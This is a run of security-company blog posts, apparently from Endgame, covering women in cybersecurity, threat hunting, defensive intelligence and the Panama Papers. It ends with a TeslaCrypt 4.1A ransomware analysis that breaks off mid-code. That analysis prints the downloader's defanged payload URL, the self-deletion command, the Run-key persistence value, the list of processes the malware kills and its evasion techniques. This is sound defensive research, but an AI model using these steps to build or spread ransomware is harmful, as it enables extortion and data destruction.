From academia to government to now industry, I’ve never worked in a field with more than 20 percent women, and that is being very generous. That is why it felt extremely strange to sit in a large room with over 700 women working in or studying cybersecurity a few days ago at the Women in Cybersecurity Conference. With so many competent and impressive technical women across the room, the myth of the unicorn was quickly dispelled. You just need to know where to look.

Sure, we had the obligatory discussion of the low and possibly further regressing level of female participation in cybersecurity (seriously, it went from 10 percent last year to 8 percent this year, according to several speakers). But the best part of the conference was that the theme mirrored what I felt initially: that though the numbers of women are small, we are doing some remarkable things, and this is an exciting time to be in the field. This positivity is what we need more of in media, pop culture, and academic portrayals of cybersecurity. It could go a long way toward dispelling the erroneous negative perception of the field (that it’s innately militaristic, and best suited to socially disconnected male loners) that continues to serve as a barrier to entry — as well as retention.

With that in mind, I’ve pulled together key themes from this year’s Women in Cybersecurity Annual Conference. I hope they’ll serve as reminders as to why we stay in the field, and that they could encourage others to pursue cybersecurity careers.

 

The Diversity Within: It’s not just about gender or race. — The conference was a great reminder that when we talk about diversifying the cybersecurity industry, we’re talking about much more than demographic differences. Within the predominantly female group at the conference, there was a phenomenal depth of professional backgrounds (industry, academia and government), generations (students of all levels, mid-career, and seasoned professionals) and disciplines (anything from computer science to theoretical mathematics to anthropology). Keynote presenters included a cryptographer, business professionals, and an incident responder. None of them were dark, shady characters in hoodies, but super-smart and enthusiastic women changing the industry.

 

Communication is key — and it’s not just about code. — The ability to write and communicate clearly surpassed any programming language as the top recommended trait for success in cybersecurity. From proposal writing to meeting with a board to working on a team, the ability to communicate technical aspects to non-technical audiences is essential now, and will only become more important as the field expands. Experts also pointed to a solid foundation in math as a bridge-builder skill — meaning that it could enable a variety of career paths within cybersecurity.

 

The mission is powerful, and unique. — Both national security and the social aspects of cybersecurity were frequently noted as key drivers and motivators that keep women in the field. This resonated for those working in industry, academia and government, and was complemented by the challenging nature of the work. If you want to find a good challenge and have a big impact, cybersecurity is the way to go.

 

No ‘manels’ in sight. — It is possible to have panels full of women talk about and inspire through their technical acumen and not their gender. Despite complaints by numerous conference organizers that they can’t find women to populate panels, these women exist — and this conference was proof of that. Here’s to hoping that panels full of men — a statistically unlikely occurrence absent conscious or unconscious bias — will someday be a distant and funny memory, like the #bindersfullofwomen meme.

 

That said…we still need men to hear and deliver these messages. — As almost every personal story noted, male allies are a crucial component to moving beyond single digit female representation in the industry. Fathers, colleagues, mentors, and friends all play an essential role and must be active participants in encouraging women to pursue or stay in the industry.

After explaining complex aspects of encryption, Yael Kalai of Microsoft conveyed another empowering message. We women are in a position of power. The industry needs us, and not the other way around. In other words, women are not token diversity hires, but are essential for organizations to achieve greater creativity and innovation, and an enhanced bottom line. That means if your company isn’t supporting you, move on. The demand is high, the supply is low — the math is on our side.

 

Andrea Limbago is the principal social scientist at Endgame.

This post was originally published by New America as part of Humans of Cybersecurity, a dedicated section on Context that celebrates stories of the people and ideas that are changing our digital lives. It is part of New America’s Women in Cybersecurity Project, which seeks to dramatically increase the representation of women in the cybersecurity/information security field by fostering strategic partnerships with industry leaders, producing cutting-edge workforce research, and championing women’s voices in media. This is a project of New America’s broader Cybersecurity Initiative, which aims to clarify and connect the often disjointed debates and policies that surround the security of our networks.

Top 3 Requirements for Threat Hunting


With the SANS Threat Hunting Summit just days away, and adversary hunting gaining visibility across the industry, hunt is one of those terms that is frequently mentioned but not well-understood. What does hunting mean? What does it take to be a hunter — defeating the most sophisticated adversaries — in a rapidly evolving threatscape?

We’ve outlined three requirements for adversary hunting below. But first, why should organizations hunt?

 

Why Hunt?

Today, organizations take an average of 146 days to discover breaches, with the majority of these detections made not by the company itself, but by external organizations. Adversaries are more sophisticated in their attacks, and the traditional security stack, dependent on short-lived indicators of compromise, is not enough to tackle these modern threats. The complexity of data has also led to alert fatigue and a data deluge (including too many false positives) that overwhelms security teams with limited time and resources. To address these challenges, targeted adversary hunting enables organizations to proactively detect and stop attackers without known indicators of compromise, before damage and loss of information occurs.

 

Top 3 Threat Hunting Requirements

 

1. Evade the Adversary

Today’s adversaries look for known defensive tools, tampering and disabling them to gain access to critical systems. They are able to persist and move throughout networks freely until they find what they are looking for. To defend against them, organizations similarly must create adversary blind spots and evade detection to gain full visibility of both their networks and the adversary. By replicating adversaries’ techniques, organizations gain much greater insight into adversarial tactics, informing both the detection and prevention.

 

2. Cover all Stages of the Kill Chain

Given the sophistication of adversaries, no single detection methodology is fail-proof for hunting. However, adversary hunting remains too manual, with clunky interfaces and more data than anyone could reasonably handle. Key capabilities are often distributed across multiple interfaces, preventing synchronization and data integration, and leaving gaps in kill chain coverage. Given the scale of the data and the sophistication of the threats, multiple methods are required within a single interface to empower the hunt mission across all stages of the kill chain. This includes automating large-scale malware classification, as well as preventing whole classes of exploits and techniques (such as lateral movement) instead of a reactive whack-a-mole approach, coupled with an intuitive interface to expedite and facilitate data exploration and prioritization.

 

3. Evict without Business Disruption

Organizations must keep operations running smoothly, and don’t have time for detection and prevention approaches that slow down or, even worse, disrupt their business operations. Simultaneously, adversary hunters must have the ability to respond and protect networks — observing, containing, or evicting an adversary. A majority of security solutions today either interrupt business processes or require companies to completely shut them down, putting the business at risk and impacting its bottom line. To ensure continuity of operations while adversary hunting, the hunt team must be able to discretely isolate the malicious activity and surgically remove it while normal business operations continue.

These are a few essential requirements for organizations to consider when hunting in their networks. To learn more detail about Endgame’s hunt approach, come meet us at the SANS Threat Hunting Summit next week or see our latest point of view here.

 

Improving Network Defense with the Big Picture of Cyber Intel


From the moment I stepped into the defensive computer operations (DCO) arena fifteen years ago, I noticed almost immediately an invisible but very real separation between DCO and its supporting intelligence components. It seemed the majority of network defenders I encountered paid insufficient attention to the intelligence which could be derived or made available through public and private partnerships. Defenders were largely uninterested in trends or attribution, wanting only to react to “the now”, quickly clean up, and move on. Was this because at that point in time (circa 2000) the DCO community was mainly worried about worms, viruses and the occasional script-kiddie? Was it because the threats were more one-off in nature as opposed to being characterized by the calculated, persistent, and sophisticated attacks that are pervasive in our community today? Despite these differences and the evolution that has occurred in the cyber domain over the last fifteen years, this invisible divide between defense and intelligence has not entirely disappeared. I was reminded of this after reading an article published by my colleague Andrea Little Limbago in Federal News Radio. Andrea asserts, “A spear phishing campaign by a state-sponsored group aimed at defense contractors to extract blueprints for next-generation technologies has extraordinarily distinct implications from a transnational criminal organization's spear phishing campaign aimed at stealing personal information to sell on the black market.” The conflation of the various cyber actors, means, and objectives that Andrea describes epitomizes the importance of big-picture cyber intelligence to comprehensive DCO.

Because I entered the world of DCO with an intelligence-oriented background, I carried into my new domain the same core analytical values that propelled my drive and curiosity throughout my former life.  As I progressed through my DCO career, I always maintained my “Five W’s + H” mindset (who, what, when, where, why and how). But, as a network defender, my primary focus was “the now”. My priorities, as with any network defender, were to keep the bad guys out, keep the critical information in, and keep systems up and running. With so much focus on the immediate threat, it’s easy to miss out on the bigger picture, which provides a wealth of information for more comprehensive detection and prevention. The following four scenarios epitomize this tension between DCO and intelligence, and how a more comprehensive integration of all available data points can inform a multi-layer detection approach and more proactive defense.

 

Scenario One: Phishing Emails

An area where intelligence can add value to a network defender’s mission involves one of the most common ingress points into a network: email. Countless times daily, phishing emails are distributed across the globe, attempting to spread their nefarious wares. Fortunately, filters have become pretty good at thwarting those attacks by preventing the malicious email messages from reaching their intended recipients or dropping the attached payload. While this is great news for network defenders, these email messages are a potential source of useful intelligence.

Whereas traditional network defense might focus solely on the malware itself, looking also at the recipients may provide intelligence that can improve defenses against future attacks.  If the recipients are all from the same department within an organization, this could indicate the source of the attack (thinking back to Andrea’s point that different types of actors should be more clearly delineated).  An IT department with valuable IP and network diagrams might be more likely to be targeted by a state-sponsored element, whereas a finance and accounting department may be targeted by a criminal organization.  Having this type of data could provide valuable situational awareness and help determine where to expend future defensive resources and measures.

For example, if every PKI Administrator from a nation-wide organization received an email directing them to apply updates by following the link in the body of the email, it would be wise to investigate this further. Determining whether the emails reached any of the intended targets, whether they were opened, and whether links were clicked is essential. In parallel, it can be equally important to find out what would take place in the event a user clicked and was exploited. This could provide network defenders, hunters, or incident responders with leads for identifying potential compromises within their network. These analytical findings can be incorporated into an overall network defense posture.
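The recipient-grouping step described above can be sketched in a few lines. This is a hypothetical illustration: the parsed-email schema (`recipient`, `department`) and the threshold are assumptions, not a real log format.

```python
from collections import Counter

# Hypothetical sketch: count phishing recipients per department to spot a
# campaign aimed at a single team (e.g., every PKI administrator).
# The parsed-email schema below is an assumption, not a real log format.

def targeted_departments(events, threshold=3):
    """Return departments whose members received `threshold`+ phishing emails."""
    counts = Counter(event["department"] for event in events)
    return {dept: n for dept, n in counts.items() if n >= threshold}

events = [
    {"recipient": "alice@corp.example", "department": "PKI Admin"},
    {"recipient": "bob@corp.example",   "department": "PKI Admin"},
    {"recipient": "carol@corp.example", "department": "PKI Admin"},
    {"recipient": "dave@corp.example",  "department": "Finance"},
]
print(targeted_departments(events))  # {'PKI Admin': 3}
```

A cluster of recipients in one department, as in the PKI example, is the kind of lead that would justify the deeper investigation described above.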

 

Scenario Two: Malware Trends

Some phishing campaigns are more ‘spray and pray’ than ‘targeted’. In the spray and pray case, the adversary’s intent is to hit a large number of targets and then take advantage of those that stick. The malware footprint can provide insight into the adversary’s intent, going a long way towards augmenting the overall cyber intelligence picture. Malware variants can (and do) change over time, and some of those changes can provide valuable intelligence. In addition to providing big-picture insights, this intelligence can also feed into dynamic detection capabilities, such as semi-supervised machine learning, that require both tactical and big-picture malware trends.

As a network defender, I routinely analyzed different variants of a particular malware family associated with phishing campaigns, identifying their root cause and taking the time to do the analysis even in cases where the email was blocked in transit or at the host. This analysis identified the changes that enabled new malware variants to bypass the current host-based mitigations. Our host-based strategies were immediately updated to focus on preventing these malware variants, and we were protected before a piece of a new variant ever made it through our email defensive layer.
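One simple way to operationalize this habit is to catalog sample hashes per family, so a blocked attachment can still be flagged as a new variant worth analyzing. The sketch below is hypothetical (the family name and payload bytes are placeholders); real variant tracking would add fuzzy hashing or feature comparison on top of exact hashes.

```python
import hashlib

# Hypothetical sketch: keep a per-family catalog of sample hashes so that a
# newly blocked attachment can still be flagged as a *new* variant worth
# analyzing, even though delivery was already stopped.

known_variants = {"family_x": {hashlib.sha256(b"payload-v1").hexdigest()}}

def is_new_variant(family: str, sample: bytes) -> bool:
    digest = hashlib.sha256(sample).hexdigest()
    catalog = known_variants.setdefault(family, set())
    new = digest not in catalog
    catalog.add(digest)  # record the sample either way
    return new

print(is_new_variant("family_x", b"payload-v2"))  # True -- new variant, analyze it
print(is_new_variant("family_x", b"payload-v2"))  # False -- already cataloged
```

Exact hashes miss trivially recompiled variants, which is exactly why the manual analysis described above remains the step that surfaces the interesting changes.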

For example, a remote administration tool (RAT) can be used to control a system through an unauthorized back door. There's a chance the attacker wouldn’t need to rely on a resolved DNS query in order to return to the victimized host - their backdoor would probably allow for that, especially if it were a very targeted attack (the attacker would most likely be very aware of the compromised host or the attacked entity). If the RAT’s C2 domain was on a DNS blacklist, and analysis stopped there, the attacker could have free rein in the network. Finding the root cause of malicious activity always has the possibility of great rewards from a defensive standpoint.

If I had worked only in “the now”, focusing on just thwarting the malware ingress point rather than doing a deeper analysis, intelligence on updates to the malware would have been lost, hindering our ability to preemptively deploy updated defensive strategies.  Therefore, while delivery mitigations are critically important, focusing only on the delivery side can cause organizations to miss out on portions of the bigger picture that could lead to better intelligence and better prevention.

 

Scenario Three: Blacklisted Domain Names

One common practice in DCO is to place known bad domain names on a blacklist.  The blacklist will most likely be populated with the malicious 3rd level domain (3LD) such as ‘bad.domain.com’, or at times at the 2nd level domain (2LD) such as ‘domain.com’.  The blacklist will then prevent a system from connecting to that particular domain.  Does this mean the blacklist will thwart an attack?  Not necessarily—it simply means the attack may be incapable of reaching its full impact due to the blacklist.  Therefore, if a system attempts to connect to the known malware reach back domain "bad.domain.com”, there's a reasonably high degree of certainty that malware is on the system.  
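The 3LD/2LD matching described above can be sketched as a naive suffix walk. This is an illustration only; a production implementation should parse registered domains against the Public Suffix List rather than treating every suffix the same.

```python
# Sketch: match a queried name against a domain blacklist at both the full
# domain (3LD) and registered domain (2LD) level. Naive suffix walk for
# illustration; production code should consult the Public Suffix List.

BLACKLIST = {"bad.domain.com", "domain.com"}

def is_blacklisted(qname: str) -> bool:
    labels = qname.lower().rstrip(".").split(".")
    # Walk every parent suffix: a.b.c -> a.b.c, b.c, c
    return any(".".join(labels[i:]) in BLACKLIST for i in range(len(labels)))

print(is_blacklisted("evil.domain.com"))  # True -- caught at the 2LD
```

Blacklisting at the 2LD catches new sibling subdomains for free, at the cost of occasionally blocking legitimate subdomains of a partially abused domain.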

To provide a real-world example, imagine ‘bad.domain.com’ is on a blacklist, and the DNS query doesn’t resolve to an IP address. At this point of malware failure, some organizations will cite it as a successful mitigation. After all, the malware couldn't connect out. Some would choose to move on to the next event while never attempting to find the system (or catalyst) behind the malicious DNS query. In other words, a single attack may have been kept from reaching fruition, but the responsible malware could very well still be on the system or network. If not found and remediated, it will likely pick up right where it left off as soon as the mitigation strategy is removed or the compromised system is relocated to an unprotected network (as can be the case with laptops).

Merely blocking a known malicious domain is insufficient, since finding the catalyst can lead to a plethora of other malicious findings.  What if twenty or more DNS queries for ‘bad.domain.com’ were blocked or mitigated?  What would this mean?  It could mean that one system was infected, trying to beacon out or phone home.  Conversely, it could indicate that twenty separate systems were infected.  Let’s imagine it was the latter.  It’s possible an attacker infiltrated the network and is moving laterally through the network, installing malicious implants along the way.  I worked a case once where this exact scenario played out.  Taking it one step further though, what if all the affected systems were part of the same group, let’s say the admin group?  That would be scary.
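The one-host-or-twenty question above is answered by pivoting from the blocked domain to the querying hosts. A minimal sketch, with hypothetical log fields (`src_host`, `qname`):

```python
from collections import defaultdict

# Hypothetical sketch: twenty blocked queries for one domain could mean one
# noisy host or twenty compromised ones. Grouping blocked DNS events by
# source host tells the difference. Log fields are stand-ins.

def hosts_querying(blocked_events, domain):
    counts = defaultdict(int)
    for event in blocked_events:
        if event["qname"] == domain:
            counts[event["src_host"]] += 1
    return dict(counts)

blocked = [
    {"src_host": "ws-01",    "qname": "bad.domain.com"},
    {"src_host": "ws-01",    "qname": "bad.domain.com"},
    {"src_host": "admin-07", "qname": "bad.domain.com"},
]
print(hosts_querying(blocked, "bad.domain.com"))  # {'ws-01': 2, 'admin-07': 1}
```

If the resulting hosts all belong to one group — say, the admin group — that is the lateral-movement scenario described above, and an incident response rather than a cleanup ticket.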

 

Scenario Four: Hard-coded IP Addresses

One of the first things I get asked when analyzing a piece of malware is “where does it reach back to?”  Most often the requester is thinking in terms of the 3LD acting as the C2 domain.  However, not all malware reaches back to a domain; some reach back to a static IP address, while others reach back to both. The malicious 3LD or 2LD may be blocked, but when a static IP address is involved, a DNS blacklist won’t prevent subsequent network communications to the IP address.  A direct connection to an IP address doesn’t require DNS.  Therefore, it’s possible for a bad actor to bypass a DNS blacklist.  I’ve had a love/hate relationship with more than a few pieces of APT malware with this exact communications profile.  By identifying and analyzing the malware behind the DNS query, other tactics, techniques and procedures (TTPs) used by the malware can be uncovered, and fed back into an organization’s network defense posture.
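One hedged way to surface this communications profile is to flag outbound connections to IP addresses that no recent DNS answer resolved to. The flow and DNS log schemas below are hypothetical stand-ins, and a real implementation would need a time window and allowlists for legitimately hard-coded services:

```python
# Hypothetical sketch: flag outbound connections to IPs that no recent DNS
# answer resolved to -- a hint of a hard-coded C2 address that a DNS
# blacklist will never see. Log schemas are stand-ins, not a real format.

def direct_ip_connections(flows, dns_answers):
    """Return destination IPs contacted without a preceding DNS resolution."""
    resolved = {answer["ip"] for answer in dns_answers}
    return sorted({flow["dst_ip"] for flow in flows if flow["dst_ip"] not in resolved})

dns_answers = [{"qname": "cdn.example.com", "ip": "198.51.100.7"}]
flows = [
    {"dst_ip": "198.51.100.7"},  # resolved via DNS -- expected traffic
    {"dst_ip": "203.0.113.99"},  # no DNS lookup -- possible hard-coded C2
]
print(direct_ip_connections(flows, dns_answers))  # ['203.0.113.99']
```

The output is a hunting lead, not a verdict: plenty of legitimate software connects straight to IPs, which is why the TTP analysis described above matters.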

 

Conclusion

These are just some examples to demonstrate the importance of incorporating more cyber intelligence and “big picture” thinking into the DCO community and of expanding its current focus on mitigations. To become better at containing and eliminating malware, we need to pay attention not only to the attack, but also, as Andrea suggests, to the critical delineations among various actors, means, objectives, and targets that can be derived from a deeper integration of intelligence and analysis into the DCO domain. Using intelligence to remain vigilant even after an attack is thwarted can improve a network defender’s chances of success. Rather than simply finding the malware and removing it from the system, it should be analyzed for potential future intelligence value, and feed into broader, proactive defenses that provide multiple layers of detection. Analyzing the malware as part of a broader intelligence picture and incorporating those insights into analysis and automated detection has enormous potential to help disrupt and prevent future attacks.

The Power Law of the Digital Pen: Adding Fuel to the Fire of Social Change


Over five years ago, the Arab Spring demonstrated the power of the digital domain in facilitating political and social change. The role of social media – still relatively nascent globally at that point – dominated the headlines and analyses as the core vehicle for shaping political debates and serving as an organizational mechanism. However, it wasn’t social media itself, but arguably the WikiLeaks revelations that provided the initial trigger. The WikiLeaks release of 1.7 GB of data was among the first manifestations of how a data leak can fuel the fire of social change (for better or worse). Last week’s Panama Papers provided yet another reminder of how the digital domain can foment social and political change. At 2.6 TB of data, the Panama Papers are not only the world’s largest data leak, but also reflect the growing intersection of data breaches and social change. Data breaches and leaks have directly and indirectly resulted in the resignation of a world leader (e.g. Iceland Prime Minister Sigmundur Davíð Gunnlaugsson), toppled CEOs (e.g., Target), and may potentially contribute to the demise of sports royalty (e.g., Lionel Messi, FIFA President Gianni Infantino). With no clear end in sight to the data revelations, world leaders’ responses are largely differentiated based on regime-type, with the domestic situation driving damage control. With 140 political leaders and over fifty companies referenced in the Panama Papers, this certainly is just the beginning. These initial responses are likely a harbinger of what to expect over the next year as both corporate executives and political leaders prepare their incident response to the leaks.

The Panama Papers are indicative of the growing ease with which vast amounts of digital data can be exfiltrated. In fact, it is plausible that the size of data breaches can be grouped with other social events that follow a power law distribution, such as the magnitude of interstate conflict or terrorist events, as well as the distribution of income or connectivity on the Internet. In each case, the impact of this socio-technical interplay is strongly influenced by the regime type, ranging from authoritarian on one side to solidified democracy on the other, with a wide spectrum in between. The ongoing data breaches and leaks similarly do not exist in a vacuum, which is why we are already witnessing wide scale and differentiated responses to the Panama Papers. For instance, the Chinese government has turned to its go-to and proven approach of Internet censorship to block any reference to the numerous family members of elite officials who are referenced in the Panama Papers. Conversely, Russia’s Vladimir Putin – whose inner circle is implicated in the Panama Papers – predictably calls the revelations nothing more than Western propaganda, and fits into his narrative that “Russia is in a state of information warfare with the West.”

Many former Eastern bloc states are also implicated, but there likely will be vast differences in how well they fare in light of the data leaks. Countries with weak opposition and/or embedded propaganda machines, such as Azerbaijan, will navigate the data revelation storm better than countries already in the midst of a corruption scandal, like Kazakhstan. Ukraine fits into this latter category, as the country’s Prime Minister just resigned amid an extant corruption crisis, which includes the President who is under tighter scrutiny thanks to the Panama Papers. Brazil similarly was already in the middle of a political corruption scandal when the Panama Papers implicated a broad spectrum of Brazil’s political elite. Interestingly, Dilma Rousseff may actually benefit from the leaks, as her main opponent faces much harsher allegations stemming from the Panama Papers than does Rousseff herself. The United Kingdom’s David Cameron – already dealing with a chaotic climate instigated by a potential exit from the European Union – is now on the offensive to counter allegations of corruption associated with his father within the Panama Papers. He released his tax returns less than a week after the Panama Papers were revealed, and since then other members of the British political elite have likewise released their tax records.

So what does all of this mean? It’s well past time to consider and prepare for the diverse means by which the digital domain can now influence anything from nation-state stability to the executive leadership of corporations. Social media is certainly one aspect, but with growing data breaches and leaks, there will be increasing reputational impacts with profound repercussions across the globe. In some cases, this could actually lead to greater transparency and calls for reforms. Conversely, it could prove to be a major challenge for capitalism, especially in democracies that are already experiencing populist movements. Regardless, as long as data growth continues to exceed Moore’s Law, the size of data leaks and breaches is likely to continue to grow, with social, political and economic repercussions across the globe.


Shifting the Narrative to Attract More Talent into Security


When talking with women about the cybersecurity industry, we always ask, “What do you think of when you hear the term hacker?” The response invariably describes a young, shady, socially-challenged guy working on his own in the dark. This is one of the many reasons why we also invariably have women come up to us after the discussion and say, “I had never even considered tech as a career option.”  This is one of the hurdles the industry must overcome in order to pull from a much more diverse talent pool and reverse the regressive statistics on women in cybersecurity (who account for anywhere from 8-11% of the workforce, depending on the source). To shift this momentum, security’s narrative must change – not just because it’s the right thing to do, but also to address security’s strained talent pipeline (in a tight talent market, we must be able to “fish in the whole sea” of potential candidates), and because diversity of all kinds is what drives innovation. 

 

Changing the narrative, a little bit at a time, was our goal today as we had the great privilege to welcome 65 sophomore girls from New York City’s Brearley School to our Arlington office to talk about the breadth of opportunities available to them in security.

 

After we provided an overview of our backgrounds, the industry, policy challenges, and building a culture to attract and retain a phenomenal and diverse workforce, it was time for Q&A. The students did not disappoint, asking insightful questions about the balance between security and privacy, how to transition from idea to product, and for tips on how they can protect themselves online. Just as importantly, they did not ask about the challenges of women in tech. This is meaningful. When girls start thinking about security both as something that impacts their daily life and as a field filled with opportunities and endless puzzles that require input from a range of disciplines and perspectives to solve, then we know the momentum will shift. Our hope is that we at least planted a few seeds about security as a field where women belong and can make a huge difference, helping change that narrative a little bit at a time.

 

Your Package Has Been Successfully Encrypted: TeslaCrypt 4.1A and the Malware Attack Chain


Introduction

Ransomware quickly gained national headlines in February after the Hollywood Presbyterian Medical Center in Los Angeles paid $17,000 in bitcoins to regain access to its systems.  Since then, other hospitals have similarly been attacked with ransomware, leading some industry experts to proclaim it an industry-specific crisis. Although it is commonly associated with directed campaigns aimed at high-value targets such as hospitals, ransomware is actually becoming less targeted and more omnidirectional. As our latest research on TeslaCrypt demonstrates, ransomware is not only becoming more widespread, but also more sophisticated and adaptable. TeslaCrypt 4.1A is only a week old and contains an even greater variety of stealth and obfuscation techniques than its previous variants, the earliest of which is just over a year old. Organizations and individuals alike must be aware that ransomware is as likely to be found in personal networks as in critical infrastructure networks, and that its rapid transformation and growing sophistication present significant challenges to the security community and significant threats to users of all kinds.

 

History and Current Reality of Ransomware

Ransomware has been around for at least a decade, but its evolution and frequency have exploded over the last half year. In its early days, ransomware was relatively unsophisticated, uncommon, and more targeted. Now, however, ransomware largely involves code reuse, slight modifications to older families, and a variety of spam campaigns. Capabilities that were once the exclusive realm of APTs are now accessible to attackers with fewer resources. TeslaCrypt 4.1A is indicative of this larger trend, integrating a variety of obfuscation techniques – such as AV evasion, anti-debugging, and stealth – into a powerful and rapidly changing piece of malware. Moreover, the incentive structure has shifted. Ransomware aimed at high-value targets depends entirely on getting one fish to bite, and so the ransom value is much higher. As the graphic below illustrates, with the proliferation of ransomware via widespread spam campaigns, attackers can demand smaller sums of money, which can still be extremely lucrative because success only requires infiltration of a small percentage of targets.

 

Campaign Overview

Last week, an Endgame researcher was analyzing spam emails for indications of emergent malicious activity.  The researcher came upon an interesting set of emails, which were soon determined to be part of a widespread spam campaign. The emails all announced the successful delivery of a package, which could be tracked by simply clicking on a link. The timing is especially interesting: arriving at the peak of last-minute tax filing, these delivery-notification lures are aimed squarely at procrastinators mailing in their tax forms – exactly the technically less-sophisticated users these kinds of campaigns target.  

We rapidly determined that this spam campaign was attempting to broadly deliver TeslaCrypt 4.1A to individuals.  In the subsequent sections, we’ll detail the various stages of the TeslaCrypt 4.1A attack chain, moving from infiltration to detection evasion, anti-analysis and evasion features, entrenchment, and the malicious mission, concluding with some points on the user experience. This integration of various obfuscation and deception techniques is indicative of the larger trend in ransomware toward more sophisticated and multi-faceted capabilities.

 

1.   During infiltration, the downloader is attached to the email as a zipped JavaScript file.
2.   This JavaScript file is a downloader that uses the local environment's Windows Script Host (WSH, or wscript) to download the payload. When the ZIP file is decompressed and the JavaScript file is executed, the WSH is invoked to execute the code.
3.   The downloader downloads the TeslaCrypt implant via an HTTP GET request to greetingsyoungqq[.]com/80.exe, then launches the binary.
4.   To evade debuggers, the binary uses the QueryPerformance/GetTickCount evasion technique to check runtime performance as well as threading.
5.   Next, the binary allocates heap memory in which it unpacks a PE. This PE does the following:
           a. Establishes an inter-process communication channel with the CoInitialize() and CoCreateInstance() APIs to communicate through DirectShow in order to establish various strings in memory.
           b. Uses the QueryPerformance/GetTickCount debugging evasion technique.
           c. Uses Wow64DisableWow64FsRedirection to disable file system redirection for the calling thread.
           d. Deletes the Zone.Identifier ADS after successful execution.
           e. Checks token membership for System Authority.
6.   Next, the PE drops a copy of itself to %UserProfile%\Documents\[12 random a-z characters].exe, creates a child process, and adds SeDebugPrivilege to the newly spawned process in a separate thread.
7.   Deletes the parent binary using %COMSPEC% /C DEL %S.
8.   Creates the mutex "__wretw_w4523_345" for further threading activity and runs a shell command to delete volume shadow copies.
9.   Entrenches the binary in the registry via a startup run key.
10. During encryption, it generates the public key based on the encrypted private key.
11. The implant begins encrypting all accessible files on the file system based on the file extensions in the appendix.
12. Finally, it displays the ransom note in three forms: text, image, and web page. The binary then notifies the C2 server of the presence of a new victim.

 

Delivery and the Downloader

In this instance, TeslaCrypt is delivered using a zipped email attachment containing a JavaScript downloader:

Email Spam Attack

 

Email contents

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>RE:</title>

</head>

<body>

<pre style="font-style: strong">

Your package has been successfully delivered. The proof of delivery (TRK:299736593) is enclosed down below.

</pre>

</body>

</html>

The ZIP attachment contains one file: transaction_wcVSdU.js. When the ZIP is decompressed and the JavaScript file is executed by the user, the Windows Script Host will launch and execute the JavaScript.  The downloader initiates an HTTP GET request to the following URI in order to download the TeslaCrypt payload (6bfa1c01c3af6206a189b975178965fe):

http://greetingsyoungqq[.]com/80.exe:

As of 4-14-2016, this URI is inactive.

If the request is successful, the binary will be written to disk in the current user's %TEMP% directory and launched by the JavaScript.

The payload (80.exe) was not being flagged by most popular AV products on the day we detected the malware, likely due to the obfuscation employed.  A few days later, about 40% of AV vendors had updated their signatures to catch 80.exe, and within a week a significant majority of AV vendors flagged the file as malicious.  However, none of this helps users who were victimized on the first day.

 

TeslaCrypt 4.1A Implant Variant Details

Version information contained within its metadata helps the implant masquerade as an official Windows system DLL:

 

 

 

 

 

 

 

Upon execution, the implant unpacks itself by allocating and writing a clean PE file to heap memory. The clean PE that is invoked contains the implant’s intended malicious functionality.

 

Anti-Analysis and Evasion Features

This malware exhibits some interesting anti-analysis and evasion features which speak to its sophistication level.  We will describe some of these below.

String Obfuscation

In order to evade detection and hide many of its string extractions, the binary utilizes an inter-process communications channel (COM objects). By using the CoInitialize and CoCreateInstance Windows APIs, the implant can control DirectShow via Software\Microsoft\DirectShow\PushClock using a covert channel, utilizing the quartz libraries.

 

Anti-Debugging

TeslaCrypt calls its anti-debugging function many times to thwart automated debugging and API monitoring. Using the QueryPerformance/GetTickCount evasion technique, the process stores the timer count at the beginning of an operation and records it again at the end. If the malware is being debugged, the difference will far exceed the expected normal execution time.
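The logic of this timing check can be sketched in a few lines of Python. This is a cross-platform analog, not the implant's code: `time.perf_counter` stands in for QueryPerformanceCounter, and the threshold is an illustrative value we chose, not one recovered from the binary.

```python
import time

def looks_instrumented(threshold_seconds=0.25):
    """Timing-based anti-debugging check in the spirit of the
    QueryPerformance/GetTickCount technique: take a high-resolution
    timestamp, do trivial work, and compare elapsed time against what
    unmonitored execution should take."""
    start = time.perf_counter()      # stand-in for QueryPerformanceCounter
    total = 0
    for i in range(10_000):          # trivial work; near-instant normally
        total += i
    elapsed = time.perf_counter() - start
    # Under a debugger or API monitor, single-stepping and hook overhead
    # inflate `elapsed` far beyond the threshold.
    return elapsed > threshold_seconds
```

A real implementation wraps checks like this around many operations, so that patching out a single comparison is not enough to hide the debugger.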

 

Anti-Monitoring

This TeslaCrypt variant contains a routine designed to terminate five standard Windows administrative / process monitoring applications. The binary enumerates all active processes and utilizes GetProcessImageFileName to retrieve the executable filename for each process. A process will be terminated if its filename contains any of the following strings:

taskmgr (Task Manager)

regedi (Registry Editor)

procex (SysInternals Process Explorer)

msconfi (System Configuration)

cmd (Command Shell)
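The matching appears to be a simple substring test against the process image filename. A defender-side sketch of the equivalent check (the substrings come from the list above; case-insensitive matching is our assumption, and note that substring matching also catches unrelated names such as "cmdagent"):

```python
# Substrings TeslaCrypt 4.1A looks for in process image filenames.
KILL_SUBSTRINGS = ("taskmgr", "regedi", "procex", "msconfi", "cmd")

def would_be_terminated(image_filename: str) -> bool:
    """Return True if this variant would terminate a process whose
    executable filename contains any of the targeted substrings."""
    name = image_filename.lower()
    return any(s in name for s in KILL_SUBSTRINGS)
```

This kind of recreation is useful when hunting: a process that enumerates and kills exactly these tools is itself a strong behavioral indicator.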

 

Entrenchment

The implant drops a copy of itself to disk:

%UserProfile%\Documents\[12 random a-z characters].exe

In order to establish persistence, the implant adds a registry value that points to the dropped copy:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\%s = SYSTEM32\CMD.EXE /C START %USERPROFILE%\Documents\[12 random a-z characters].exe

 

The malware also sets the EnableLinkedConnections registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections

By setting this key (which was also something done by previous versions of TeslaCrypt), network drives become available to both regular users and administrators.  This will allow the implant to easily access and encrypt files on connected network shares in addition to encrypting files on the local hard drive.  In a connected business environment, this could substantially increase the damage done by the tool.
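For hunters, the entrenchment artifacts above suggest a simple heuristic: flag Run-key values that START a 12-character lowercase executable out of the user's Documents folder. A sketch of that check (the regular expression is ours, written from the pattern described above, not extracted from the binary):

```python
import re

# Matches the entrenchment pattern described above: CMD.EXE /C START
# launching %USERPROFILE%\Documents\[12 random a-z characters].exe
TESLACRYPT_RUN_VALUE = re.compile(
    r"START\s+%USERPROFILE%\\Documents\\[a-z]{12}\.exe",
    re.IGNORECASE,
)

def run_value_matches(value_data: str) -> bool:
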